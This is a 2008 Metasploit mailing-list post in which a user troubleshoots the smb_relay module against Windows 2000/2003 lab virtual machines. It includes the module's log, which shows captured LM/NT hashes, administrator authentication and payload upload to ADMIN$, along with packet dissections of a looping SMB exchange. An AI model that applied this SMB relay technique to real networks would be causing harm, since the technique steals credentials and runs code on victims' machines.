Metasploit mailing list archives

Issue with smb_relay


From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Thu, 20 Nov 2008 23:49:06 +0100

Hello,

I have an issue with the smb_relay module.

My configuration is the following:
- Attacker = Ubuntu 8.04 with either framework 3.2-rel or 3.3-svn.
- Victim = either Windows 2000 SP4 or Windows 2003 SP2 "out of the box"
virtual machines (French versions of Windows).

I tried all framework/victim combinations, but none worked. Plugin
output is:
------------------------------------------------------------------
21:12:46 - Initialized the Metasploit Framework GUI.
21:14:24 - smb_relay [*] Launching exploit windows/smb/smb_relay...
21:14:25 - smb_relay [*] Server started.
21:14:30 - smb_relay [*] Received 192.168.0.129:1033
TEST2K3\Administrator
LMHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b
NTHASH:9c69c0a7006c4b69ebdf16cdbd78d62abc1d6dc8cc6ef82b OS:Windows
Server 2003 R2 3790 Service Pack 2 LM:
21:14:30 - smb_relay [*] Authenticating to 192.168.0.129 as
TEST2K3\Administrator...
21:14:30 - smb_relay [*] AUTHENTICATED as TEST2K3\Administrator...
21:14:30 - smb_relay [*] Connecting to the ADMIN$ share...
21:14:30 - smb_relay [*] Regenerating the payload...
21:14:30 - smb_relay [*] Uploading payload...
21:14:30 - smb_relay [*] Created \KiTOBqaK.exe...
21:14:30 - smb_relay [*] Connecting to the Service Control Manager...
------------------------------------------------------------------

At this point, the binary file has been successfully uploaded to the
victim. Then the module goes into an infinite loop while communicating
with the SCM. It seems that both keep exchanging SMB packets with a
0-sized payload (packets dumped below).

P.S. I also tried the SOMBI stuff (mentioned before on this list), but I
failed to see how that stuff could be more than a "proof of concept".

Regards,
- Nicolas RUFF

#1 192.168.0.128 -> 192.168.0.129
SMB      Read AndX Request, FID: 0x4001, 0 bytes at offset 186

SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        [Response in: 236]
        SMB Command: Read AndX (0x2e)
        Error Class: Success (0x00)
        Reserved: 00
        Error Code: No Error
        Flags: 0x18
        Flags2: 0x2001
        Process ID High: 0
        Signature: 0000000000000000
        Reserved: 0000
        Tree ID: 2049
        Process ID: 61626
        User ID: 2048
        Multiplex ID: 3431
    Read AndX Request (0x2e)
        Word Count (WCT): 10
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        FID: 0x4001
        Offset: 186
        Max Count Low: 0
        Min Count: 0
        [File Offset: 186]
        [File RW Length: 0]
        Remaining: 0
        Byte Count (BCC): 0

#2 192.168.0.129 -> 192.168.0.128
SMB      Read AndX Response, 0 bytes

SMB (Server Message Block Protocol)
    SMB Header
        Server Component: SMB
        [Response to: 235]
        [Time from request: 0.000436000 seconds]
        SMB Command: Read AndX (0x2e)
        Error Class: Success (0x00)
        Reserved: 00
        Error Code: No Error
        Flags: 0x98
        Flags2: 0x2001
        Process ID High: 0
        Signature: 0000000000000000
        Reserved: 0000
        Tree ID: 2049
        Process ID: 61626
        User ID: 2048
        Multiplex ID: 3431
    Read AndX Response (0x2e)
        Word Count (WCT): 12
        AndXCommand: No further commands (0xff)
        Reserved: 00
        AndXOffset: 0
        [File Offset: 186]
        [File RW Length: 0]
        Remaining: 0
        Data Compaction Mode: 0
        Reserved: 0000
        Data Length Low: 0
        Data Offset: 0
        Data Length High (multiply with 64K): 0
        Reserved: 000000000000
        Byte Count (BCC): 0
